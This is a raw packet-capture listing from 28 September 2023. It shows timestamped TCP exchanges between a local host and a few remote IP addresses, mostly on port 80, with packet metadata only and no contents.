                                                                                              Sep 28, 2023 06:01:56.590063095 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590074062 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590099096 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590117931 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590135098 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590150118 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590172052 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590186119 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590209007 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590231895 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590245008 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590266943 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590282917 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590289116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590318918 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590333939 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590356112 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590368986 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590393066 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590408087 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590444088 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590451956 CEST8049805178.237.33.50192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590533972 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:01:56.615817070 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:56.769488096 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769601107 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769623041 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769643068 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769668102 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769689083 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769726992 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769762993 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769798994 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769835949 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769870996 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769875050 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769875050 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769875050 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769875050 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769906044 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769946098 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769961119 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769961119 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769961119 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.769984007 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.769992113 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770024061 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770054102 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770059109 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770073891 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770093918 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770119905 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770128965 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770142078 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770164967 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770188093 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770203114 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770210981 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770240068 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770262003 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770277023 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770289898 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770313978 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770333052 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770350933 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.770363092 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.770414114 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771215916 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771253109 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771320105 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771388054 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771388054 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771388054 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771388054 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771426916 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771456003 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771465063 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771476984 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771506071 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771537066 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771544933 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771558046 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771601915 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771620989 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771656990 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771682024 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771718025 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771725893 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771761894 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771781921 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771799088 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771819115 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771833897 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771842003 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771871090 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771893024 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771929026 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.771939993 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771977901 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.771992922 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772016048 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772033930 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772053003 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772073030 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772089005 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772095919 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772125959 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772144079 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772181988 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772197008 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772233963 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772248983 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772270918 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772285938 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772310019 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772320032 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772351980 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772367954 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772389889 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772409916 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772433043 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772449017 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772469044 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772489071 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772509098 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772526979 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772547007 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772558928 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772584915 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772602081 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772624016 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772639036 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772660971 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772681952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772697926 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772716999 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772733927 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772747993 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772772074 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772785902 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772819996 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772825003 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772857904 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772871017 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772895098 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772903919 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772932053 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772942066 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.772969007 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.772981882 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773004055 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773015022 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773041964 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773055077 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773078918 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773089886 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773116112 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773130894 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773152113 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773164034 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773189068 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773200989 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773226023 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773241043 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773263931 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773277044 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773300886 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773312092 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773336887 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773350954 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773372889 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773380041 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773411036 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773425102 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773451090 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773467064 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773488045 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.773497105 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.773538113 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.826209068 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.950963974 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951082945 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951107979 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951198101 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951235056 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951256037 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951364040 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951414108 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951452971 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951472998 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951493025 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951513052 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951533079 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951553106 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951572895 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951577902 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951627016 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951656103 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951673985 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951679945 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951694965 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951720953 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951747894 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951843023 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951894999 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951908112 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951956034 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.951982975 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.951993942 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952008963 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952028990 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952044010 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952054977 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952100039 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952112913 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952158928 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952176094 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952224970 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952239037 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952274084 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952289104 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952316999 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952342033 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952377081 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952528954 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952574968 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952647924 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952696085 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952812910 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952862978 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952874899 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952922106 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952938080 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.952981949 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.952994108 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953013897 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953037024 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953041077 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953057051 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953079939 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953105927 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953125000 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953155041 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953171015 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953186035 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953197002 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953234911 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953263044 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953310013 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953351974 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953398943 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953448057 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953494072 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953542948 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953598022 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953610897 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953660011 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953674078 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953721046 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953735113 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953772068 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953779936 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953814030 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953900099 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953911066 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953943968 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953952074 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.953978062 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.953989029 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954044104 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954061985 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954133034 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954140902 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954171896 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954197884 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954242945 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954243898 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954293013 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954309940 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954355955 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954371929 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954417944 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954442024 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954480886 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954489946 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954530954 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954540968 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954583883 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954592943 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954637051 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954663038 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954706907 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954724073 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954765081 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954828978 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954864979 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954873085 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954901934 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.954941034 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.954977036 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955002069 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955044985 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955054998 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955094099 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955107927 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955152988 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955200911 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955213070 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955245018 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955271006 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955312967 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955316067 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955368042 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955418110 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955440998 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955466986 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955488920 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955514908 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955537081 CEST4980480192.168.2.3157.90.36.211
